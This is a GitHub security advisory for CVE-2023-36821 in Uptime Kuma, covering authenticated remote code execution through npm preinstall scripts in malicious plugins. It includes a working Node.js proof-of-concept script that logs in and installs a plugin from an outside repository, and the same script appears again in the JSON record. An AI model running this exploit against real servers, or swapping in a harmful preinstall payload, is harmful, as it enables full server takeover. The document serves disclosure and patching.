GHSA-7GRX-F945-MJ96

Vulnerability from github – Published: 2024-05-01 10:01 – Updated: 2024-05-01 10:01
VLAI?
Summary
Uptime Kuma vulnerable to authenticated remote code execution via malicious plugin installation
Details

Summary

Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker.

Details

Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login. After downloading a plugin, it's installed by calling npm install in the installation directory of the plugin: https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216

Because the plugin is not validated against the official list of plugins or installed with npm install --ignore-scripts, a maliciously crafted plugin taking advantage of npm scripts can gain remote code execution.

PoC

In the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty index.js and a package.json containing the script: "preinstall": "echo \"Malicious code could have been executed as user $(whoami)\" > /tmp/poc". This will be executed when installing the plugin.

  1. Start Uptime Kuma: docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1
  2. Create a user using the Uptime Kuma web interface, e.g. user admin with password admin123
  3. Confirm that the PoC file to be created doesn't exist yet:
➜  ~ docker exec -it uptime-kuma cat /tmp/poc
cat: /tmp/poc: No such file or directory
  1. Create file poc.js with the following content:
SERVER = "ws://localhost:3001";
USERNAME = "admin";
PASSWORD = "admin123";


const { io } = require("socket.io-client");
const socket = io(SERVER);
const repo = "https://github.com/n-thumann/npm-install-script-poc";
const name = "npm-install-script-poc";

socket.emit(
  "login",
  { username: USERNAME, password: PASSWORD, token: "" },
  (res) => {
    if (res.ok !== true) return console.log("Login failed");

    console.log("Login successful");
    socket.emit("installPlugin", repo, name, () => {
      console.log("Done");
      socket.close();
    });
  }
);
  1. Install socket.io-client: npm install socket.io-client
  2. Run the script: node poc.js:
# node poc.js
Login successful
Done
  1. The PoC file has been created:
➜  ~ docker exec -it uptime-kuma cat /tmp/poc
Malicious code could have been executed as user root

Impact

This vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.

Severity ?
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.22.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "uptime-kuma"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.22.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-36821"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-01T10:01:24Z",
    "nvd_published_at": "2023-07-05T22:15:09Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nInstallation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker.\n\n### Details\nUptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login.\nAfter downloading a plugin, it\u0027s installed by calling `npm install` in the installation directory of the plugin:\nhttps://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216\n\nBecause the plugin is not validated against the official list of plugins or installed with `npm install --ignore-scripts`, a maliciously crafted plugin taking advantage of [npm scripts](https://docs.npmjs.com/cli/v9/using-npm/scripts) can gain remote code execution.\n\n### PoC\nIn the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty `index.js` and a `package.json` containing the script: `\"preinstall\": \"echo \\\"Malicious code could have been executed as user $(whoami)\\\" \u003e /tmp/poc\"`. This will be executed when installing the plugin.\n\n1. Start Uptime Kuma: `docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1`\n2. Create a user using the Uptime Kuma web interface, e.g. user `admin` with password `admin123`\n3. Confirm that the PoC file to be created doesn\u0027t exist yet:\n```\n\u279c  ~ docker exec -it uptime-kuma cat /tmp/poc\ncat: /tmp/poc: No such file or directory\n```\n4. Create file `poc.js` with the following content:\n```\nSERVER = \"ws://localhost:3001\";\nUSERNAME = \"admin\";\nPASSWORD = \"admin123\";\n\n\nconst { io } = require(\"socket.io-client\");\nconst socket = io(SERVER);\nconst repo = \"https://github.com/n-thumann/npm-install-script-poc\";\nconst name = \"npm-install-script-poc\";\n\nsocket.emit(\n  \"login\",\n  { username: USERNAME, password: PASSWORD, token: \"\" },\n  (res) =\u003e {\n    if (res.ok !== true) return console.log(\"Login failed\");\n\n    console.log(\"Login successful\");\n    socket.emit(\"installPlugin\", repo, name, () =\u003e {\n      console.log(\"Done\");\n      socket.close();\n    });\n  }\n);\n```\n5. Install `socket.io-client`: `npm install socket.io-client`\n6. Run the script: `node poc.js`:\n```\n# node poc.js\nLogin successful\nDone\n```\n7. The PoC file has been created:\n```\n\u279c  ~ docker exec -it uptime-kuma cat /tmp/poc\nMalicious code could have been executed as user root\n```\n\n### Impact\nThis vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.",
  "id": "GHSA-7grx-f945-mj96",
  "modified": "2024-05-01T10:01:24Z",
  "published": "2024-05-01T10:01:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/louislam/uptime-kuma/security/advisories/GHSA-7grx-f945-mj96"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36821"
    },
    {
      "type": "WEB",
      "url": "https://github.com/louislam/uptime-kuma/pull/3346"
    },
    {
      "type": "WEB",
      "url": "https://github.com/louislam/uptime-kuma/commit/a0736e04b2838aae198c2110db244eab6f87757b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/louislam/uptime-kuma"
    },
    {
      "type": "WEB",
      "url": "https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216"
    },
    {
      "type": "WEB",
      "url": "https://github.com/louislam/uptime-kuma/releases/tag/1.22.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Uptime Kuma vulnerable to authenticated remote code execution via malicious plugin installation"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.